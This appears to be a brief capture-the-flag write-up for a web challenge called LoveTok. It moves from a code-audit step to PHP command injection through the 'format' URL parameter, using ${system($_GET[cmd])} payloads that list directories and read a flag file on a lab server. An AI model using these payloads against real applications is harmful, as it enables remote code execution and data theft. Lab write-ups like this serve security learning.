1. LoveTok

1.1. Code Audit

  • find url http://159.65.20.166:31685/?format=r with info exhibition

image-20240119140745106

image-20240119140749067

image-20240119140752469

1.2. Command Injection

  • http://159.65.20.166:31685/?format=${system($_GET[cmd])}&cmd=ls

image-20240119140808093

  • http://159.65.20.166:31685/?format=${system($_GET[cmd])}&cmd=ls ../

image-20240119140827814

  • http://159.65.20.166:31685/?format=${system($_GET[cmd])}&cmd=cat ../flag8AiQ0